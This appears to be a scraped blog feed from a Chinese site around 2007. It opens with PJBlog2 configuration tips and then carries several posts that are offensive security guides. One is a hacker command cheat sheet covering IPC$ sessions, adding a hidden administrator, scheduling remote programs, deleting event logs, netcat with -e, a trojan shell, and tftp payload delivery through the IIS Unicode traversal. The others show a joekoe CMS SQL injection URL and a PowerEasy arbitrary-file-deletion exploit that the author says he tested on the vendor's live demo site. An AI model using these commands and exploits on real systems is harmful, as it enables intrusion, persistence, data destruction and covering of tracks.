在系统首页文件(default.asp)和日志文件(article.asp)最底下加入如下代码即可.这两个文件都在根目录下.

<noscript>
<iframe scr="*.htm"></iframe>
</noscript>
<script language="JavaScript">
document.oncontextmenu=new Function("event.returnValue=false;");
document.onselectstart=new Function("event.returnValue=false;");
</script>
x10.一些关于PJ文件的说明
根目录."footer.asp"底部页面文件,用途可以加上自定义的代码,如加上统计代码.
根目录."BlogLink.asp"申请链接页面,用途可以加上自己的网站信息,或者其他.
根目录."const.asp"数据库和Cookies域文件,适当修改可以增加一定的安全性.
"Template\Article.asp"文件,用途适当修改可以在日志底部加入广告代码或其他.
=============================================================
3.首段首行缩进


  首段首行无法缩进,是因为PJBlog2自动删除了日志头尾的空格,实现缩进的修改方法相当的简单,只要找到common文件夹下的function.asp文件,在第279行找到Str=Trim(Str),改成Str=RTrim(Str)就可以了。
  还有发表日志时首行最好使用全角空格,因为半角空格在不同的字体下可能长度与汉字有所不同。
  此外由于修改以后日志前面的空格是不会自动删除的,可能会影响日志显示的美观,所以在发表日志时要注意前面不要留空。
=============================================================

以下是问题集合(来自本论坛,有很多没测试,本也是菜鸟哈,只是方便大家而已!有问题我不负责,考虑谨慎使用)

--------------------------------------------------------------------------------
1. 怎么样修改,让上传得附件与原来同名,而不是让系统自动生产.
打開attachment.asp
找到
F_Name=randomStr(1)&Year(now)&Month(now)&Day(now)&Hour(now)&Minute(now)&Second(now)&"."&F_File.FileExt
改為
F_Name=F_File.filename
Ok。

以後可能出現文件名重復,出錯!不要怪我。

--------------------------------------------------------------------------------

2. 手机怎么上我们的BLOG网站  ?
1、你的手机要支持GPRS
2、你的手机开通GPRS
3、在手机的“网络”功能里输入“http://你的网址/wap.asp”就可以访问到你的blog了

--------------------------------------------------------------------------------


3三种屏蔽、过滤垃圾评论和留言广告的方法

当你一大早起来就发现留言本和评论里又多了好多好多条垃圾留言,一个一个的删吧,天天如此,累?!抓狂?!
本方法,可以检测提交的垃圾信息,例如垃圾评论、垃圾留言或者屏蔽某未注册用户的发言,都是可以的。

原创作者:番茄(http://www.tblog.com.cn),特别感谢!

为尊重作者的劳动成果,请到作者站点查看代码:

第一种方法:http://www.tblog.com.cn/article.asp?id=290  
把代码加在 const.asp 的最后 (加在最后面的 %>之前)
工具发的垃圾留言,可以在过滤字段中加入该评论作者的IP地址,和发出来的一些域名,另外如果<h1>用处不大的话也一起给过滤掉。

第二种方法:http://www.tblog.com.cn/article.asp?id=294

另外,第一种方法能够比较好的屏蔽垃圾留言,但是显示警告信息时经常为乱码;
第二种方法可以写成插件了,在插件未完成之前,大家可以先加入屏蔽代码救急,番茄会尽快完成过滤补丁的安装文件以及过滤关键词管理插件。请大家等待。

第三种方法:(推荐)
下载官方的管理员提供的一个补丁...

--------------------------------------------------------------------------------

4.关于首页左右英文的修改

到后台界面与插件里,设置模块里改相对的英文提交就就可以了。。。
--------------------------------------------------------------------------------
5.如何才能把侧边栏移到左边?

在SKIN中设置,打开layout.css,把sidebar的float:left改为right,mainContent的float:right改为left就OK了

6.如何解决:抱歉网站暂时关闭此类问题?

可以手动打开站点
先到 login.asp 登陆
然后打开 control.asp 登陆后台开启即可
出现这样的问题,是由于后台在处理某个需要关闭数据的工作后出错导致无法再次打开数据库.

]]> http://www.9427188.com/default.asp?id=272 <![CDATA[网管和黑客都必须知道的命令]]> ui47@163.com(admin) Wed,03 Oct 2007 13:31:24 +0800 http://www.9427188.com/default.asp?id=272
  (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""  

  (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"  

  (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$  

  (查看远程主机时间) net time \\IP地址  

  (定时启动某个程序) at \\IP地址 02:18 readme.exe  

  (查看共享) net view \\IP地址  

  (查看netbios工作组列表) nbtstat -A IP地址  

  (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"  

  (这两条把自己增加到管理员组): net user 用户名 密码 /add  

  net localgroup Administrators 用户名 /add  

  (断开连接) net use \\IP地址\ipc$ /delete  

  扫尾:  

  del C:\winnt\system32\logfiles\*.*  

  del C:\winnt\ssytem32\config\*.evt  

  del C:\winnt\system32\dtclog\*.*  

  del C:\winnt\system32\*.log  

  del C:\winnt\system32\*.txt  

  del C:\winnt\*.txt  

  del C:\winnt\*.log  

  一、netsvc.exe  

  下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:  

  netsvc /list \\IP地址  

  netsvc schedule \\IP地址 /query  

  netsvc \\IP地址 schedule /start  

  二、OpenTelnet.exe  

  远程启动主机的Telnet服务,并绑定端口到7878,例如:  

  OpenTelnet \\IP地址 用户名 密码 1 7878  

  然后就可以telnet到主机的7878端口,进入DOS方式下:  

  telnet IP地址 7878  

  三、winshell.exe  

  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:  

  p Path (查看winshell主程序的路径信息)  

  b reBoot (重新启动机器)  

  d shutDown (关闭机器)  

  s Shell (执行后你就会看到可爱的“C:\>”)  

  x eXit (退出本次登录会话,此命令并不终止winshell的运行)  

  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)  

  四、3389登陆器,GUI方式登录远程主机的  

  五、elsave.exe  

  事件日志清除工具  

  elsave -s \\IP地址 -l "application" -C  

  elsave -s \\IP地址 -l "system" -C  

  elsave -s \\IP地址 -l "security" -C  

  执行后成功清除应用程序日志,系统日志,安全日志  

  六、hbulot.exe  

  开启win2kserver和winxp的3389服务  

  hbulot [/r]  

  使用/r表示安装完成后自动重起目标使设置生效。  

  七、nc.exe(netcat.exe)  

  一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。  

  想要连接到某处: nc [-options] hostname port[s] [ports] ...  

  绑定端口等待连接: nc -l -p port [-options] [hostname] [port]  

  参数:  

  -e prog 程序重定向,一旦连接,就执行 [危险!!]  

  -g gateway source-routing hop point[s], up to 8  

  -G num source-routing pointer: 4, 8, 12, ...  

  -h 帮助信息  

  -i secs 延时的间隔  

  -l 监听模式,用于入站连接  

  -n 指定数字的IP地址,不能用hostname  

  -o file 记录16进制的传输  

  -p port 本地端口号  

  -r 任意指定本地及远程端口  

  -s addr 本地源地址  

  -u UDP模式  

  -v 详细输出——用两个-v可得到更详细的内容  

  -w secs timeout的时间  

  -z 将输入输出关掉——用于扫描时  

  八、TFTPD32.EXE  

  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:  

  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名  

  然后可以直接令文件运行:  

  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名  

  九、prihack.exe是IIS的printer远程缓冲区溢出工具  

  idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。  

  一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。

]]> http://www.9427188.com/default.asp?id=271 <![CDATA[乔客(joekoe) CMS 4.0 的2个高危漏洞]]> ui47@163.com(admin) Wed,19 Sep 2007 10:35:00 +0800 http://www.9427188.com/default.asp?id=271
2. SQL注入漏洞:在Channel变量中加入诸如语句,比如:common/upload.asp?channel=use'&filetype=gif&filename=&fileinput=u_face&formname=&thumbname=&thumbinput=

然后上传,就会报错.

  

]]> http://www.9427188.com/default.asp?id=270 <![CDATA[动易网站管理系统删除任意文件漏洞]]> ui47@163.com(admin) Wed,19 Sep 2007 10:33:01 +0800 http://www.9427188.com/default.asp?id=270 此漏洞存在于User目录下的User_saveflash.asp文件中,其第6~22行代码如下所示。

Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonth

objName_FSO = Application("objName_FSO")

ObjInstalled_FSO = IsObjInstalled(objName_FSO)

If ObjInstalled_FSO = True Then

Set fso = Server.CreateObject(objName_FSO)

Else

Response.Write "&&SendFlag=保存 >>> NO"

Response.end

End If

act = trim(request("act"))

//这里是关键

If act="" Then

Call Main()

Else

  Call CoverColorFile()

  //如果act不为空,则调用CoverColorFile()函数

End If

set fso = Nothing

下面我们一起来看看函数CoverColorFile()的代码。

Sub CoverColorFile()

//此函数用于生成图像BMP文件

  Dim whichfile, head, Colortxt, i, rline, badwords

  //注意whichfile变量

Response.Expires = -9999

Response.AddHeader "Pragma","no-cache"

Response.AddHeader "cache-ctrol","no-cache"

Response.ContentType = "Image/bmp"

//输出图像文件头

head = ChrB(66) & ChrB(77) & ChrB(118) & ChrB(250) & ChrB(1) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(54) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(40) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(172) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(130) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(1) & ChrB(0) & ChrB(24) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(64) & ChrB(250) & ChrB(1) & ChrB(0) & ChrB(0) & ChrB(0) &_

ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) &_


ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0) & ChrB(0)

  Response.BinaryWrite head

  whichfile=trim(request("color_url"))

  // whichfile由用户提交的color_url而来

  Set Colortxt = fso.OpenTextFile(server.mappath(whichfile),1)

  //以只读方式打开用户提交的变量whichfile,这里取得的是文件

rline = Colortxt.ReadLine //读取文件一行

badwords = split(rline,"|") //以“|”作分隔

Colortxt.Close

  fso.deleteFile(server.mappath(whichfile))

  //这句就是漏洞了,此句的作用是删除文件。由于whichfile由用户提交而来,又没有经过任何安全处理,所以便构成漏洞了。如果我们让 color_url=../conn.asp,那么就直接删除conn.asp文件了,同样,我们可以让color_url为站内任一文件,最后,我们可以删除全站的文件。

for i=0 to UBound(badwords)

Response.BinaryWrite to3(badwords(i))

next

End Sub

有了上面的漏洞,我们就一起去测试一下官方网站,看看是否存在此漏洞吧。打开官方演示网站,如图1所示,我们就以动易的Logo作测试吧。查看其路径,发现在images目录下,名为logo.gif,


现在,我们注册一个用户,然后进入会员中心,在URL处填入:。
成功提交之后,返回到首页,现在我们可以看到,官方仍然存大此重大漏洞。官方logo.gif处变成了一个红叉,说明已被删掉。

解决办法为最好不要从外部接收数据,要么就删除代码:fso.deleteFile(server.mappath(whichfile))

]]>